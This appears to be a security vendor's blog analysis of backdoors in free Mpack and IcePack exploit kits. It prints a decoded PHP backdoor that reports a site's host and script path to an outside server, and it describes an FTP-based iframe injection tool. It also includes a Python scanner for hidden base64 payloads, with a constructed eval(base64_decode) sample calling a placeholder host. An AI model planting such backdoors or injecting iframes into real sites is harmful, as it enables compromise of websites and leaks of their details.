
This eventually leads to an iframe tag being added to the visitor's page, redirecting them to the Russian Mpack server. We have also observed what appears to be a backdoor within the free IcePack code. This backdoor is base64-encoded, so it stands out a little in the code and is therefore easier to spot; however, it is appended to the end of a long line of unrelated code, so unless you scroll all the way to the right it can be missed. Again displayed here is the result of decoding the original line of code:
file_get_contents('http://[removed].in/c.php?host=' . $_SERVER['HTTP_HOST'] . '&root=' . $_SERVER['SCRIPT_FILENAME']);

The call reports the host name of the compromised site and the absolute filesystem path of the installed script to a third-party server. That server is not returning anything interesting at the moment, so it is hard to tell exactly what its function is. Perhaps it was used to track the number of installations? However, from where it is placed and from the way it is encoded we have no doubt that this code is up to no good.
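The hiding technique described above, a base64 blob appended far to the right of an otherwise boring line, is easy to hunt for mechanically. The following scanner is an added example written for this post; it is not code from the Mpack or IcePack kits or from Symantec. It walks PHP source line by line, decodes every long base64 run that yields clean ASCII text, and flags decoded text that phones home or reads $_SERVER variables, recording the column so the "scroll all the way to the right" problem is visible in the report. The PHP sample and the c2.example.invalid callback host are constructed for illustration.

```python
"""
Hunt for base64 payloads hidden at the far right of long PHP lines, decode
them, and flag anything that phones home with $_SERVER details.

Added example for this post; not code from Mpack, IcePack or Symantec.
The PHP sample and the callback URL are constructed for illustration.
"""
import base64
import binascii
import re

# A base64 run long enough to hide a call like the one in the post; shorter
# runs (hashes, short tokens) are ignored to keep the noise down.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Tokens that make a decoded blob worth a human look: outbound requests,
# code execution, and the server variables the post's backdoor leaks.
SUSPICIOUS = (
    "file_get_contents(", "curl_init(", "fsockopen(", "eval(",
    "$_SERVER['HTTP_HOST']", "$_SERVER['SCRIPT_FILENAME']", "http://",
)

# Constructed payload mirroring the decoded line in the post; the host is a
# placeholder (.invalid is reserved and never resolves).
PAYLOAD = ("file_get_contents('http://c2.example.invalid/c.php?host=' . "
           "$_SERVER['HTTP_HOST'] . '&root=' . $_SERVER['SCRIPT_FILENAME']);")

# Constructed PHP: a harmless 1x1 GIF (binary, must not be flagged) and a
# long, boring config line with the encoded backdoor appended far to the right.
_FILLER = "$ui_colors = array(" + ", ".join(
    "'#%06x'" % (i * 0x111111) for i in range(16)) + ");"
SAMPLE_PHP = (
    "<?php\n"
    "$title = 'panel';\n"
    "$logo = 'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7';\n"
    + _FILLER + " eval(base64_decode('"
    + base64.b64encode(PAYLOAD.encode()).decode() + "'));\n"
)


def decode_if_text(blob):
    """Decode a base64 run; return the text, or None if it is not clean ASCII
    (images, compressed data and random identifiers fall out here)."""
    try:
        raw = base64.b64decode(blob, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if all(c.isprintable() or c in "\r\n\t" for c in text):
        return text
    return None


def find_hidden_payloads(php_source):
    """Return one finding per base64 run that decodes to text containing a
    suspicious token. The column is recorded because the post's backdoor
    was only visible after scrolling far to the right."""
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        for match in B64_RUN.finditer(line):
            text = decode_if_text(match.group())
            if text is None:
                continue
            hits = [tok for tok in SUSPICIOUS if tok in text]
            if hits:
                findings.append({
                    "line": line_no,
                    "column": match.start(),
                    "line_length": len(line),
                    "decoded": text,
                    "hits": hits,
                })
    return findings


if __name__ == "__main__":
    for f in find_hidden_payloads(SAMPLE_PHP):
        print("line %d, col %d of %d: %s" % (
            f["line"], f["column"], f["line_length"], ", ".join(f["hits"])))
        print("  decoded: " + f["decoded"])
```

Run against the constructed sample, the GIF line decodes to binary and is silently dropped, while the config line produces a single finding whose column is well past anything that fits on screen. Against a real kit, point find_hidden_payloads() at each .php file's contents and review every hit by hand; the token list is deliberately short and should be extended for whatever obfuscation the sample at hand uses (gzinflate, str_rot13, chr() chains) rather than trusted as complete.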
Another interesting piece of code taken from the free IcePack code is a list of servers on which the distributors would prefer you not to add iframes. IcePack contains an FTP checker script that can log into legitimate FTP servers in order to add a redirect to an exploit server (normally achieved by adding an iframe tag). Before logging in to an FTP server, the IcePack code first checks whether the Web site is on the banned list, shown below, and if it is, it blocks the login attempt:
$bad_hosts = array ( 'boom.ru', 'narod.ru', 'jino-net.ru', 'fatal.ru', 'h10.ru', 'h11.ru', 'h12.ru', 'h13.ru', 'h14.ru', 'h15.ru', 'h16.ru', '110mb.com', 'by.ru', 'tripod.com');

This $bad_hosts list shows sites where the people who released this free IcePack code would prefer you not to put iframes. Perhaps these are sites they use or control, but it's not surprising that most of these sites are Russian (both Mpack and IcePack are coded by Russian groups).
Since we have not purchased the real versions of these packs, we cannot say for certain whether any or all of the code mentioned here is included in the real versions. It just goes to show that the same caution is needed in the underground as in the real world: caveat emptor. As for the free versions of these packs, if something looks too good to be true, it probably is.
All of the exploits contained in these free exploit packs are detected by Symantec products with the latest definitions.